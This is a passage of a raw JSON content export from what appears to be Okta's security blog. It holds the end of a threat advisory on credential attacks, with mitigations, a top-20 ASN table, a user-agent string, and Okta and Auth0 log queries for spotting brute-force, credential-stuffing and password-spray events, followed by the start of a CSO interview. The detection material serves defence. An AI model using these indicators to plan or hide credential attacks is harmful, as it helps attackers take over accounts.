Lockout\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\". Exempt requests from devices that have successfully authenticated\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Monitor for \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"ThreatInsight\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\" events and rate limit violations \",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Use \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://auth0.com/docs/secure/attack-protection/brute-force-protection\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Brute-force Protection\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\" to block and lockout accounts subject to persistent failed authentication requests \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Monitor for sign-in events using invalid usernames/non-existent users and/or previously breached passwords\",\"marks\":[],\"data\":{}}]}]}]}]},{\"nodeType\":\"heading-2\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-2\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"TTPs used in Recent Attacks\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-4\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Top 20 ASNs\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"table\",\"data\":{},\"content\":[{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Autonomous System Number\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Network Provider\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"53667 \",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"FranTech Solutions\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"62744 \",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Quintex Alliance Consulting\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"60729 \",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Stiftung Erneuerbare Freiheit\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"1101\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"SURF B.V.\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"210558 \",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"1337 Services GmbH\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"197540 \",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"netcup GmbH\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"16276 \",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"OVH SAS\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"60404 \",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Liteserver\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"210644 \",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"AEZA INTERNATIONAL LTD\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"399532 \",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Universal Layer LLC\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"200651 \",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"FlokiNET ehf\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"44925\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"1984 ehf\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"51396\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Pfcloud UG\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"4224 \",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"The Calyx Institute\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"51852\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Private Layer INC\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"56655\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"TerraHost AS\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"36352\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"HostPapa\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"208323\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Foundation for Applied Privacy\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"63949\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Akamai Connected Cloud\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"41281\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"KeFF Networks Ltd\",\"marks\":[],\"data\":{}}]}]}]}]},{\"nodeType\":\"heading-3\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-4\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"User Agent\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Mozilla/5.0 (Windows NT 10.0; rv:102.0) Gecko/20100101 Firefox/102.0\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-2\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-2\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Relevant System Log Queries: The Okta Platform\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"table\",\"data\":{},\"content\":[{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Event\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"System Log Query\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"ThreatInsight has Detected Access Requests from IPs Associated with Suspicious Behavior\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"eventType eq \\\"security.threat.detected\\\"\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Suspected Brute Force Attack (\",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://attack.mitre.org/techniques/T1110/001/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"T1110.001\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\")\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"eventType eq \\\"security.threat.detected\\\" AND outcome.reason eq \\\"Login failures\\\"\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Suspected Credential Stuffing Attack (\",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://attack.mitre.org/techniques/T1110/004/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"T1110.004\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\")\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"eventType eq \\\"security.threat.detected\\\" AND outcome.reason co \\\"Login failures with high unknown users count\\\"\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Suspected Password Spray Attack (\",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://attack.mitre.org/techniques/T1110/003/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"T1110.003\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\")\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"eventType eq \\\"security.threat.detected\\\" AND outcome.reason co \\\"Password Spray\\\"\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Targeted Brute Force Attack against a Specific Org\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"eventType eq \\\"security.attack.start\\\"\",\"marks\":[],\"data\":{}}]}]}]}]},{\"nodeType\":\"heading-2\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\\nRelevant System Log Queries: The Auth0 Platform\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"table\",\"data\":{},\"content\":[{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Event\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Log Query\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Failed login request\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"f\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Failed login: Invalid username/email address\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"fu\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Failed login: Invalid password\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"fp\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Login attempt from a known leaked password\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"pwd_leak\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Signup (registration) attempt from a leaked password\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"signup_pwd_leak\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"IP address blocked: excessive failed login or registration requests without a successful login\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"limit_mu\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"User account lockout: excessive failed login requests per time period from the same IP address\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"limit_sul\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"IP address blocked: excessive failed login attempts to a single user account\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"limit_wc\",\"marks\":[],\"data\":{}}]}]}]}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}}]}]}"},"summary":null,"updatedAt":"2025-02-09T23:45:08.431Z","secAuthor":[{"id":"2d0612d0-ea24-5a48-bed3-797e6306eea4","bio":{"bio":""},"image":{"url":"https://images.ctfassets.net/kbkgmx9upatd/1uHU5vrZGhUcNFNAzgylU2/e92b96b2d85e5fb3c5da8a2c1695ddc9/md_profile.png"},"name":"Moussa Diallo","jobTitle":"Sr Manager, Identity Threat Research","slug":"moussa-diallo","node_locale":"en"},{"id":"e0099522-136e-5003-b6a5-f4499896bf19","bio":{"bio":"Brett Winterford is Vice President of Okta Threat Intelligence. Okta Threat Intelligence delivers timely, highly relevant and actionable insights about the threat environment, with a focus on identity-based threats. Brett was previously the regional Chief Security Officer for Okta in the Asia Pacific and Japan, and advised business and technology leaders in the region on all things identity. Prior to Okta, Brett held a senior security leadership role at Symantec, and helmed security research, awareness and education at Commonwealth Bank. Brett is also an award-winning journalist, editor-in-chief of iTnews Australia and a contributor to the Risky Business podcast and newsletter, to ZDNet, the Australian Financial Review and the Sydney Morning Herald.
"},"image":{"url":"https://images.ctfassets.net/kbkgmx9upatd/5cVIStynit3itWxHA4pv8S/8e8e647b20b34abcaff72ee837cb797c/Brett_20Resized.jpg"},"name":"Brett Winterford","jobTitle":"VP, Okta Threat Intelligence","slug":"brett-winterford","node_locale":"en"}]},{"slug":"/articles/2025/01/cso-conversations-matt-immler","id":"bac68bc4-173f-5478-bc88-ec9b4cf26241","title":"CSO Conversations: Matt Immler, Regional CSO of Americas East","date":"2025-01-22T00:00","sys":{"contentType":{"sys":{"id":"secBlogpost","linkType":"ContentType","type":"Link"}},"type":"Entry"},"body":{"raw":"{\"data\":{},\"content\":[{\"data\":{},\"content\":[{\"data\":{},\"marks\":[{\"type\":\"italic\"}],\"value\":\"CSO Conversations is a blog series interviewing Okta’s Regional CSOs supporting David Bradbury, Okta’s Chief Security Officer in providing the best service for our customers. Okta’s Regional CSOs are integral to Okta’s Security Trust and Culture team, building and strengthening trusted advisor relationships with global security thought leadership.\",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[{\"type\":\"bold\"}],\"value\":\"What motivated your career pursuit in cybersecurity?\",\"nodeType\":\"text\"}],\"nodeType\":\"heading-4\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"I originally got my degree in Computer Science and went to work straight out of college at the US DoD. In that world, security is at the forefront of all projects and quickly became more interesting to me than the actual coding I was doing at the time.\",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[{\"type\":\"bold\"}],\"value\":\"How has your previous experience shaped your approach to cybersecurity today?\",\"nodeType\":\"text\"}],\"nodeType\":\"heading-4\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"During my time in government, I worked on both offensive and defensive security teams. Having a chance to work on both sides of the aisle gave me a unique perspective from both the attacker and defender’s point of view. This allows me to look at a particular defensive technique and draw upon my own experience in the offensive role to determine if and how I could circumvent the control.\",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[{\"type\":\"bold\"}],\"value\":\"Are there any existing or emerging threats of particular interest to you?\",\"nodeType\":\"text\"}],\"nodeType\":\"heading-4\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"Modern platforms are providing us with more and more capabilities, and along with that a wealth of settings with near limitless potential for misconfiguration. Many security issues I have encountered in the past have not necessarily been the result of the actual software or platform, but the way in which it is configured. I see the need for a balance in providing the greatest level of freedom to the user, while ensuring the appropriate guardrails are in place to balance risk.\",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[{\"type\":\"bold\"}],\"value\":\"What trends are you seeing in cybersecurity relating to your region?\",\"nodeType\":\"text\"}],\"nodeType\":\"heading-4\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"The cybersecurity conversation is expanding from what we would conventionally think of being part of that field. The overall resilience of the system is coming up more often in the security context of the conversation than in previous years. More focus is being given to the organization's ability to withstand, recover from, and adapt to security events, and not just merely to prevent them from occurring in the first place.\",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[{\"type\":\"bold\"}],\"value\":\"If you could provide a few short cybersecurity words of wisdom to Okta customers, what would they be?\",\"nodeType\":\"text\"}],\"nodeType\":\"heading-4\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"Be sure to review and apply any published best practices. While core documentation will make sure you can get the job done, the best practice guides ensure that you’re using it the recommended way, which in Okta’s case, takes a security approach when determining those best practices. The identity landscape is evolving quickly with new capabilities entering the mainstream every year, but those changes take time and many older protocols or methods must be necessarily supported to bridge the gap for adoption. Just because an implementation works, doesn’t always mean it’s the most secure option available.\",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[{\"type\":\"bold\"}],\"value\":\"What is the most significant change you’ve seen in the cybersecurity industry in your career to-date?\",\"nodeType\":\"text\"}],\"nodeType\":\"heading-4\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"I hate buzzwords, but this question is going to make me go down that road. I've avoided it until now, but we all know the answer: It starts with ‘A’ and ends with ‘I’ – its new, full capabilities are not well understood, and it poses unknown threats that are testing the efficacy of existing defenses and prompting swift development of new mitigation strategies. I think a bulk of upcoming security initiatives are going to be heavily influenced by the new things we learn every day about AI and what it could be capable of doing, and at the very least will be a frustrating new addition to threat models everywhere. \",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[{\"type\":\"bold\"}],\"value\":\"From your perspective, what is the impact of cybersecurity awareness in today’s organizations?\",\"nodeType\":\"text\"}],\"nodeType\":\"heading-4\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"Cybersecurity awareness is a critical function in any organization, but has long needed to evolve from simply sending a quarterly mock phishing email and routine annual training to something more comprehensive. Anyone who has ever worked in this field knows that the same 10% of employees are going to click that phishing email every time, and if your numbers are that low, you’re lucky. Intelligent threat actors are going to craft quality phishing emails, and it only takes one click to be successful. Okta has heavily invested in our security awareness program in order to make it more frequent, interesting, and engaging to our employees, e.g., incentivising the identification and reporting of even the most minor security concerns to help employees feel like they are part of the program and not just being lectured. \",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[{\"type\":\"bold\"}],\"value\":\"How do you employ 